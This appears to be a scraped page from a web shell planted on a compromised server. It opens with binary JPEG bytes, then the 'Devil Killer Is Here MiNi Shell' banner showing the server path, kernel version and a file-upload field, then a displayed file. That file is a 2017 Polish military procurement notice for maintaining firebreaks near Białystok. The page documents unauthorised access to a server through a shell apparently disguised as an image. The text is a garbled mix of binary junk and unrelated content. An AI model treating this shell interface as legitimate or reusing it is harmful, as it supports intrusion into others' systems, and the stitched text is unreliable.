JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170425/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170425/73233-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.25wog.wp.mil.pl' target='_blank'>http://www.25wog.wp.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 73233 - 2017
              z dnia 2017-04-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Białystok: Pielęgnacja pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG z podziałem na 3 części.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>25 Wojskowy Oddział Gospodarczy w Białymstoku, krajowy numer identyfikacyjny
              20068982800000, ul.
              ul. Kawaleryjska 
              70,
              15-601  
              Białystok, woj.
              podlaskie, państwo
              Polska, tel.
              261 398 839, e-mail
              25wog.kancelaria@ron.mil.pl, faks
              261 398 813.
              <br />
              Adres strony internetowej (URL): www.25wog.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jenostka Wojskowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.25wog.wp.mil.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.25wog.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Pielęgnacja pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG z podziałem na 3 części.<br /><b>Numer referencyjny: </b>23/PN/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />3<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem  zamówienia  jest usługa  pielęgnacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG z  zakresu  gospodarki  leśnej  zgodnie z określeniem w art. 6 ust. 1 pkt. 1 ustawy z dnia 28 września 1991r.  o  lasach (tekst  jedn.:Dz.  U.  z 2015r.,poz. 2100 z późn. zm.dalej: Ustawa o lasach.
1.	Przedmiot zamówienia obejmuje 3 części. 
2.	  Zamawiający dopuszcza możliwości składania ofert na 3 części tj:
Część I
Pielęgnacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona
oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy 
garnizonowej OC Zielona
Część II
Pielęgnacja pasów przeciwpożarowych  rejon Skład Osowiec.
Część III
Pielęgnacja wałów przeciwpożarowych  rejon Skład Hajnówka.
3.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 4                       do SIWZ.
4. Zamawiający informuje, że nie wymaga określonych cech usługi, dotyczących dostosowania usługi do potrzeb wszystkich użytkowników                     z uwzględnieniem wymagań w zakresie dostępności dla osób niepełnosprawnych w nawiązaniu do art. 30 ust. 9 pkt 1 i niniejszej treści SIWZ.
Przedmiotem zamówienia jest usługa pielęgnacji pasów ppoż. i wałów przeciwpożarowych na terenach wojskowych administrowanych przez 25 WOG.
Usługa została podzielona na trzy części:
Część I
Pielęgnacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona
Część II
Pielęgnacja pasów przeciwpożarowych  rejon Skład Osowiec.
Część III
Pielęgnacja wałów przeciwpożarowych  rejon Skład Hajnówka.
Warunki ogólne
Pasy i wały przeciwpożarowe na dzień odbioru muszą być oczyszczone                      z gałęzi, samosiejek, wykoszonych lub wyoranych traw, wrzosów itp..
Pielęgnacja pasów musi być wykonana poprzez orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm i przebronowanie broną talerzową. 
W miejscach niedostępnych dla ciągnika rolniczego pasy należy zmineralizować glebogryzarką ręczną. 
Szczegółowy zakres robót oraz ich częstotliwość określona została dla każdej części usługi w szczegółowym zakresie działania odrębnie, z uwagi 
na specyfikę przyrodniczą kompleksów.
Upoważniony przedstawiciel Zamawiającego lub osoba przez niego wyznaczona wskaże Wykonawcy miejsce realizacji usługi.
Wykonawca przed przystąpieniem do realizacji usługi dostarcza 
do Infrastruktury 25 WOG listę pracowników i wykaz sprzętu uczestniczącego 
w  zadaniu. 
5.	Zamawiający na podstawie art. 29 ust. 3a ustawy wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę zgodnie z ustawą z dn. 26 czerwca 1974 r.  Kodeks pracy (Dz. U. z 2014 r, poz. 1502 ze zm.), zawartej na czas realizacji zamówienia co najmniej 1 osoby wykonującej w szczególności czynności: koszenie, wycinanie, rekultywacja przy czym: 
       Wymagania dotyczące zatrudnienia osób uczestniczących w realizacji zamówienia na podstawie umowy o pracę
5a)	rodzaj czynności osób realizujących zamówienie, do których ma zastosowanie obowiązek zatrudnienia na umowę o pracę:
5b)	Dokumentowanie zatrudnienia osób o których mowa w pkt. 5a) przez 
             Wykonawcę/Podwykonawcę na umowę o pracę:
5.1	Oświadczenie zawierające wykaz osób, o których mowa w pkt. 5a) (załącznik nr 7), z którymi zawarto umowę o pracę.
5.2	Termin na dostarczenie powyższego dokumentu:
a)	3 dni robocze od  dnia podpisania umowy;
b)	3 dni robocze po dokonaniu zmiany pracownika w trakcie realizacji zamówienia;
c)	 Sposób prowadzenia kontroli przez Zamawiającego w zakresie spełniana warunku zatrudnienia osób na umowę o pracę, o których mowa w art. 29 ust. 3a ustawy pzp:
Zgodnie z projektem umowy, który stanowi załącznik do siwz.
d)	Sankcje za naruszenie obowiązku zatrudnienia osób na umowę o pracę wykonujących czynności, o których mowa wyszczególnione są  w zapisach projektu umowy załącznik do siwz.

	Wykonawca/Podwykonawca zatrudniający obcokrajowców, przed rozpoczęciem przez nich prac, ma obowiązek zgłoszenia ich do Służby Kontrwywiadu Wojskowego zgodnie Decyzją Nr 19 Ministra Obrony Narodowej z dnia 24.01.2017 roku w sprawie organizowania współpracy międzynarodowej                    w resorcie obrony narodowej (Dz. Urz. MON poz. 18). Po uzyskaniu stosownego zezwolenia wydanego przez Służbę Kontrwywiadu Wojskowego, Wykonawca/Podwykonawca ma obowiązek przedstawić niezwłocznie dokument Zamawiającemu. 
Wykonawca robót w pełni odpowiada za bezpieczeństwo i higienę pracy                       w miejscu realizacji robót oraz zachowanie bezpieczeństwa pożarowego.
Pracownicy Wykonawcy przed przystąpieniem do realizacji usługi zostaną zapoznani przez przedstawiciela Użytkownika lub osobę przez niego upoważnioną z uregulowaniami dotyczącymi wstępu na obszar chroniony,                         z systemem przepustkowym, zakazami lub nakazami obowiązującymi na danym terenie, w tym używania telefonów komórkowych, wykonywania zdjęć, przyjmowania interesantów itp.  
Przed rozpoczęciem robót wszyscy pracownicy realizujący usługę na terenie kompleksów wojskowych 2RBLog w Składach Hajnówka i Osowiec powinni okazać zaświadczenie o aktualnym szkoleniu w zakresie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010 rok o ochronie informacji niejawnych, zgodnie z Ustawą z 05 sierpnia 2010r. o ochronie informacji niejawnych (Dz.U. z 2016r.  poz.1167 t.j.). W przypadku braku zaświadczenia o szkoleniu                         z zakresu ochrony informacji niejawnych zostanie ono przeprowadzone przez Pełnomocnika Ochrony Informacji Niejawnych 2RBLog lub osobę przez niego upoważnioną. Szkolenie przeprowadzone będzie bezpłatnie.
Terminy przeprowadzenia zabiegów określono szczegółowo w każdej części zadania. Wykonana usługa musi być potwierdzona protokołem odbioru.  Brak zatwierdzonego protokołu będzie równoznaczny z niewykonaniem usługi. Protokół odbioru usługi z każdego zabiegu jest załącznikiem do faktury VAT wystawionej przez Wykonawcę. Wyszczególnione w opisie przedmiotu zamówienia czynności Wykonawca zamówienia wykonuje na własny koszt. Wykonawca ma obowiązek zachować w tajemnicy wszelkie informacje uzyskane w czasie pracy.
Usługi powinny być zrealizowane zgodnie z obowiązującymi normami branżowymi, przepisami ochrony środowiska i bez stworzenia zagrożeń dla zdrowia ludzi.
Przewiduję się wizję lokalną w celu oszacowania stopnia trudności i warunków realizacji zadania.
Część I  Pielęgnacja pasów przeciwpożarowych na strzelnicy garnizonowej OC Zielona oraz ochrona przeciwpożarowa terenów przyległych do wału strzelnicy garnizonowej OC Zielona

1.	Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Białystok.
2.	Rodzaj prac do wykonania: 
2.1.	Mineralizacja istniejących pasów przeciwpożarowych o szerokości 3 m               i szacunkowej długości  7,500 m (powierzchnia 2,250 ha) poprzez:
a.	orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm                        i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.	przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt
2.2.	Wykonanie oprysku środkiem chwastobójczym zmineralizowanego pasa ppoż (pow. 2,25 ha)
2.3.	Wycinka samosiejek na terenie o łącznej powierzchni 2 ha w miejscach wskazanych przez Zamawiającego oraz i wykoszenie trawy na terenie o łącznej powierzchni  8,5 ha w miejscach wskazanych przez Zamawiającego poprzez:
a.	wykoszenie trawy, chwastów oraz wycięciu samosiejek na wskazanej powierzchni, przy czym wysokość trawy po skoszeniu nie powinna być wyższa niż 7 cm, a pozostałych pni po samosiejkach 10 cm,
b.	wykoszone trawy i chwasty należy zebrać i wywieźć na koszt Wykonawcy a wycięte samosiejki złożyć w miejscu wskazanym przez Zamawiającego.
c.	wycince podlegają samosiejki  krzewy w wieku do 10 lat oraz samosiejki o obwodzie na wysokości 5 cm od podstawy .
3.	Częstotliwość wykonywania zabiegów:
a.	mineralizacja pasów  ppoż.  dwa razy w roku: 
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.10.2017r. 31.10.2017r.
b.	wycinka samosiejek i wykoszenie trawy  jeden raz w roku od 01.07.2017r. do 31.08.2017r. (szczegółowy termin zostanie ustalony                             z Zamawiającym)
c.	Wykonanie oprysków środkiem chwastobójczym  jeden raz w roku od 01.08.2017r do 15.08.2017r.
Część II  Pielęgnacja pasów przeciwpożarowych  rejon Skład Osowiec.

1.	Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Łomża.
2.	Rodzaj prac do wykonania:
Pielęgnacja pasów ppoż. przy budynkach magazynowych oraz pasów obwodnicy (łączna powierzchnia pasów 13,600 ha) poprzez  wykonanie orki pługiem a w miejscach niedostępnych dla ciągnika rolniczego glebogryzarką ręczną, bronowanie przeoranych pasów wraz z oczyszczeniem terenu, oraz oczyszczeniem ogrodzenia obwodnicy usytuowanego na pasach ppoż.                       z wszelkiej wrastającej roślinności, chwastów i samosiejek: 
a.	przy budynkach magazynowych o szerokości 2 m i łącznej powierzchni 0,68 ha;
b.	wzdłuż ogrodzeń obwodnicy (pasy zewnętrzne i wewnętrzne)                            o szerokości 5 m, długości 15 240 m i łącznej powierzchni 7,62 ha
c.	wzdłuż ogrodzenia zewnętrznego kompleksu od strony drogi krajowej nr 65 o szerokości 2 m i długości 2 200m (powierzchnia 0,11 ha), szerokości 3 m              i długości 575 m (powierzchnia 0,17 ha)
d.	pas ochronny usytuowany po obu stronach drogi wewnętrznej między ogrodzeniem o szerokości 7,00 m i długości 7200 m (powierzchnia 5,04 ha)
3. Zakres usługi obejmuje:
a.	orkę ciągnikiem z pługiem przyczepnym na głębokości 25-30 cm                         i przebronowanie broną talerzową, a w miejscach niedostępnych pas należy przeorać glebogryzarką ręczną,
b.	przeorany pas należy oczyścić z chwastów, samosiej i zalegających gałęzi, które Wykonawca wywozi na własny koszt,
c.	usuwanie wszelkiej wrastającej roślinności, chwastów i samosiejek                     z całej powierzchni ogrodzeń usytuowanych na pasach przeciwpożarowych.
d.	wykonanie oprysków wzdłuż ogrodzenia obwodnicy po każdym wykonanym zabiegu pielęgnacyjnym
4.	Częstotliwość wykonywania zabiegów:
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.07.2017r. 15.07.2017r.
III etap w terminie - od 01.08.2017r. do 15.08.2017r.
IV etap w terminie - od 15.09.2017r. do 30.09.2017r.

Część III  Pielęgnacja wałów przeciwpożarowych  rejon Skład Hajnówka.
1.	Każdorazowe wejście na teren kompleksu wojskowego Wykonawca ma obowiązek uzgodnić z Kierownikiem Grupy Zabezpieczenia Hajnówka.
2.	Rodzaj prac do wykonania: 
Koszenie trawy na wałach przeciwpożarowych budynków magazynowych                  o łącznej powierzchni 6,875 ha.
Wały przeciwpożarowe zostaną wskazane Wykonawcy przed przystąpieniem do realizacji umowy.
3. Zakres usługi obejmuje:
a.	koszenie wałów do granic pasów ppoż. poszczególnych budynków,
b.	wygrabienie skoszonej trawy i wywiezienie jej na koszt Wykonawcy,
c.	uprzątnięcie podjazdów i opasek wokół budynków po koszeniu.
4.	Częstotliwość wykonywania zabiegów  trzy razy w roku:
I etap w terminie - do 05.06.2017r.
II etap w terminie  od 01.07.2017r. do 20.07.2017r.
III etap w terminie - od 10.09.2017r. do 20.09.2017r.

WIZJA LOKALNA:
Termin wizji lokalnej zostaje wyznaczony na dzień:
	Część I- OC Zielona-  28.04.2017r. o godz. 09:00. 
          Osoba do kontaktu Aneta MAZUR tel. 261 39 88 49
	Część II- Rejon Skład Osowiec- 28.04.2017r. o godz. 11:00. 
Osoba do kontaktu Tadeusz JANCZYŁO tel.261 38 61 06
	Część III- Rejon Skład Hajnówka- 28.04.2017r. o godz. 12:00. 
Osoba do kontaktu Paweł PATEJUK tel. 261 398 032
Należy stawić się najpóźniej na 5 minut przed przeprowadzeniem wizji. 
Zebranie o którym mowa powyżej, nie jest zebraniem wykonawców                         o którym mowa w art. 38 ust. 3 ustawy Pzp.
Wszelkie merytoryczne zapytania, które nasuną się w trakcie jak i po zebraniu wykonawców należy kierować do Zamawiającego zachowując formę pisemną na adres e-mail: 25wog.kancelaria@ron.mil.pl lub fax: 261 39 88 13.
<br /><br /><b>II.5) Główny kod CPV: </b>75251120-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/09/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 30/09/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;                        w przypadku oferty wspólnej, zaświadczenie to musi złożyć każdy                       z podmiotów składających wspólną ofertę
